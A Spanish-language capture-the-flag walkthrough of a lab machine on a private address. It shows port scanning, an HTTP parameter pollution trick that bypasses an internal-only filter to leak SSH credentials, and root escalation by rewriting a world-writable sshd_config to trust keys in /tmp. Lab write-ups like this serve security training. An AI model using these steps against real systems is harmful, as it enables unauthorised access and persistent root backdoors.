Enumeramos puertos (servidor web en Go):
❯ nmap -sCV -p 22,8080 -oN 02-targeted.txt 192.168.1.8
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9 (protocol 2.0)
8080/tcp open http Golang net/http server
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_http-open-proxy: Proxy might be redirecting requests
| Welcome to our Public Server. Maybe Internal.
...Enumeramos y el robots.txt revela dos rutas:
❯ cat robots.txt
/redirect
/credz
❯ curl http://192.168.1.8:8080/credz
Only accessible internally./credz solo es accesible internamente, y /redirect toma un parámetro url. Probando HTTP parameter pollution (duplicar url) sorteamos el filtro interno:
❯ curl http://192.168.1.8:8080/redirect
Parameter 'url' needed.
❯ curl 'http://192.168.1.8:8080/redirect?url=/credz'
Only accessible internally.
❯ curl 'http://192.168.1.8:8080/redirect?url=/credz&url=/credz'
ssh/EazyLOLCon esas credenciales entramos por SSH (sistema Alpine) y obtenemos la primera flag:
❯ ssh ssh@192.168.1.8
ssh@192.168.1.8's password: EazyLOL
Welcome to Alpine!
...
jan:~$Revisamos sudo -l:
jan:~$ sudo -l
...
User ssh may run the following commands on jan:
(root) NOPASSWD: /sbin/service sshd restartPodemos reiniciar sshd, y además /etc/ssh/sshd_config es escribible. Lo reconfiguramos para permitir login de root por clave pública desde un authorized_keys en /tmp:
jan:~$ ls -l /etc/ssh/sshd_config
-rw-rw-rw- 1 root root 3355 Jan 28 09:01 /etc/ssh/sshd_config
jan:~$ echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config
jan:/tmp$ echo "AuthorizedKeysFile /tmp/authorized_keys" >> /etc/ssh/sshd_config
jan:~$ echo 'PubkeyAuthentication yes' >> /etc/ssh/sshd_config
jan:~$ echo 'StrictModes no' >> /etc/ssh/sshd_configColocamos nuestro authorized_keys en /tmp, reiniciamos el servicio y entramos como root:
jan:/tmp$ sudo /sbin/service sshd restart
❯ ssh root@192.168.1.8 -i id_rsa
Enter passphrase for key '/home/wh01s17/.ssh/id_rsa':
Welcome to Alpine!
...
jan:~# whoami
rootObtenemos nuestra flag.
Fin.